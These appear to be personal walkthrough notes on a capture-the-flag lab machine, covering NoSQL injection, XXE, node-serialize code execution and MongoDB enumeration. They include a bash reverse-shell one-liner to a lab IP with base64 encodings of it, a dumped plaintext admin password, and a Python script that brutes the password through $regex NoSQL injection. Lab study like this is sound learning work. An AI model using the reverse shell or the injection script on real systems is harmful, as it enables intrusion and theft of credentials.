Encoding payload part was hard.
URL encode, changing some special characters, base64…
00:47 NoSQL injection
NoSQL injection - HackTricks
01:20 XML external entity injection
What is XXE (XML external entity) injection? Tutorial & Examples | Web Security Academy
In this section, we'll explain what XML external entity injection is, describe some common examples, explain how to find and exploit various kinds of XXE ...
XML External Entity (XXE) Processing | OWASP Foundation
XML External Entity (XXE) Processing on the main website for The OWASP Foundation. OWASP is a nonprofit foundation that works to improve the security of softwar...
01:52 node-serialize Code Execution vulnerability
node-serialize vulnerabilities | Snyk
Learn more about known vulnerabilities in the node-serialize package. Serialize a object including it's function into a JSON.
02:44 reverse shell
'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1'
└─$ echo -n 'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC44LzEyMzQgMD4mMQ==
"+" did tricky thing. added one more space to get rid of it.
└─$ echo -n 'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1' | base64
YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuOC8xMjM0IDA+JjE=
There's still "+".
└─$ echo -n 'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1' | base64
YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuOC8xMjM0ICAwPiYx
03:08 mongodb
> show dbs
admin 0.000GB
blog 0.000GB
config 0.000GB
local 0.000GB
> use blog
switched to db blog
> show collections
articles
users
> db.users.find()
{ "_id" : ObjectId("61b7380ae5814df6030d2373"), "createdAt" : ISODate("2021-12-13T12:09:46.009Z"), "username" : "admin", "password" : "IppsecSaysPleaseSubscribe", "__v" : 0 }
List Users — MongoDB Manual
03:34 password brute force script using $regex
$regex — MongoDB Manual
pattern matching on strings in MongoDB 6.0
import sys
import string
import requests
import json
def make_password(pswd):
payload = '{ "$regex": "%s"}' % pswd
login_data = {"user":"admin","password": json.loads(payload)}
req = requests.post("http://10.10.11.139:5000/login",json=login_data)
if "Invalid Password" in req.text:
return False
return True
password = '^'
result = False
while result == False:
for i in string.ascii_letters:
new_password = password + i
sys.stdout.write(f"\r{new_password}")
if make_password(new_password):
password += i
break
Maybe I should add counter to stop its loop in the end.